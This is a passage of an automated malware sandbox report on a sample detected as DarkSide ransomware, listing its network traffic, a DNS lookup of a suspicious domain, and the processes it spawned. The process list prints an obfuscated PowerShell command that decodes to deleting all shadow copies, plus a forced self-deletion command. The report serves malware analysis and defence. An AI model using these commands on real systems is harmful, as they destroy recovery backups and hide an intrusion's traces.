                                                    May 1, 2021 06:02:01.356842041 CEST53571678.8.8.8192.168.2.3
                                                    May 1, 2021 06:02:01.357245922 CEST53618948.8.8.8192.168.2.3
                                                    May 1, 2021 06:02:01.359385014 CEST53599468.8.8.8192.168.2.3
                                                    May 1, 2021 06:02:02.021855116 CEST6526753192.168.2.38.8.8.8
                                                    May 1, 2021 06:02:02.073360920 CEST53652678.8.8.8192.168.2.3
                                                    May 1, 2021 06:02:02.860122919 CEST6314853192.168.2.38.8.8.8
                                                    May 1, 2021 06:02:02.918569088 CEST53631488.8.8.8192.168.2.3
                                                    May 1, 2021 06:02:09.050707102 CEST5094553192.168.2.38.8.8.8
                                                    May 1, 2021 06:02:09.107491970 CEST53509458.8.8.8192.168.2.3
                                                    May 1, 2021 06:02:26.612629890 CEST6439653192.168.2.38.8.8.8
                                                    May 1, 2021 06:02:26.669533968 CEST53643968.8.8.8192.168.2.3
                                                    May 1, 2021 06:02:27.266350031 CEST5924653192.168.2.38.8.8.8
                                                    May 1, 2021 06:02:27.323138952 CEST53592468.8.8.8192.168.2.3
                                                    May 1, 2021 06:02:27.954442024 CEST5459553192.168.2.38.8.8.8
                                                    May 1, 2021 06:02:28.005805016 CEST53545958.8.8.8192.168.2.3
                                                    May 1, 2021 06:02:28.415169001 CEST5461053192.168.2.38.8.8.8
                                                    May 1, 2021 06:02:28.471988916 CEST53546108.8.8.8192.168.2.3
                                                    May 1, 2021 06:02:28.501214027 CEST5524553192.168.2.38.8.8.8
                                                    May 1, 2021 06:02:28.559714079 CEST53552458.8.8.8192.168.2.3
                                                    May 1, 2021 06:02:29.220364094 CEST6174053192.168.2.38.8.8.8
                                                    May 1, 2021 06:02:29.280143976 CEST53617408.8.8.8192.168.2.3
                                                    May 1, 2021 06:02:29.986509085 CEST5745853192.168.2.38.8.8.8
                                                    May 1, 2021 06:02:30.049607038 CEST53574588.8.8.8192.168.2.3
                                                    May 1, 2021 06:02:30.718791962 CEST6229853192.168.2.38.8.8.8
                                                    May 1, 2021 06:02:30.767518044 CEST53622988.8.8.8192.168.2.3
                                                    May 1, 2021 06:02:32.092012882 CEST5945653192.168.2.38.8.8.8
                                                    May 1, 2021 06:02:32.150382996 CEST53594568.8.8.8192.168.2.3
                                                    May 1, 2021 06:02:33.034701109 CEST6438053192.168.2.38.8.8.8
                                                    May 1, 2021 06:02:33.094901085 CEST53643808.8.8.8192.168.2.3
                                                    May 1, 2021 06:02:33.604178905 CEST6060353192.168.2.38.8.8.8
                                                    May 1, 2021 06:02:33.663634062 CEST53606038.8.8.8192.168.2.3

                                                    ICMP Packets

                                                    TimestampSource IPDest IPChecksumCodeType
                                                    May 1, 2021 06:01:51.252677917 CEST192.168.2.1192.168.2.3829d(Port unreachable)Destination Unreachable
                                                    May 1, 2021 06:01:52.739573002 CEST192.168.2.1192.168.2.3829d(Port unreachable)Destination Unreachable
                                                    May 1, 2021 06:01:54.255220890 CEST192.168.2.1192.168.2.3829d(Port unreachable)Destination Unreachable

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                    May 1, 2021 06:00:50.416008949 CEST192.168.2.38.8.8.80x2d14Standard query (0)securebestapp20.comA (IP address)IN (0x0001)

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                    May 1, 2021 06:00:50.475758076 CEST8.8.8.8192.168.2.30x2d14No error (0)securebestapp20.com185.105.109.19A (IP address)IN (0x0001)

                                                    Code Manipulations

                                                    Statistics

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Start time:06:00:49
                                                    Start date:01/05/2021
                                                    Path:C:\Users\user\Desktop\rUUR0qQI22.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Users\user\Desktop\rUUR0qQI22.exe'
                                                    Imagebase:0xce0000
                                                    File size:60416 bytes
                                                    MD5 hash:9D418ECC0F3BF45029263B0944236884
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000000.00000003.293094493.00000000007DC000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000000.00000003.292893139.00000000007DC000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000000.00000003.256370495.00000000007DC000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000000.00000003.209248518.00000000007E9000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000000.00000003.292412422.00000000007DC000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000000.00000003.290688765.00000000007DC000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000000.00000003.210042199.00000000007E9000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000000.00000003.209243107.00000000007C6000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000000.00000002.428838029.00000000007AA000.00000004.00000020.sdmp, Author: Joe Security
                                                    Reputation:low

                                                    General

                                                    Start time:06:01:14
                                                    Start date:01/05/2021
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:powershell -ep bypass -c '(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s'
                                                    Imagebase:0x7ff678f10000
                                                    File size:447488 bytes
                                                    MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Reputation:high

                                                    General

                                                    Start time:06:01:15
                                                    Start date:01/05/2021
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6b2800000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:06:02:31
                                                    Start date:01/05/2021
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Windows\system32\cmd.exe' /C DEL /F /Q C:\Users\user\Desktop\RUUR0Q~1.EXE >> NUL
                                                    Imagebase:0x900000
                                                    File size:232960 bytes
                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:06:02:32
                                                    Start date:01/05/2021
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6b2800000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Disassembly

                                                    Code Analysis

                                                    Reset < >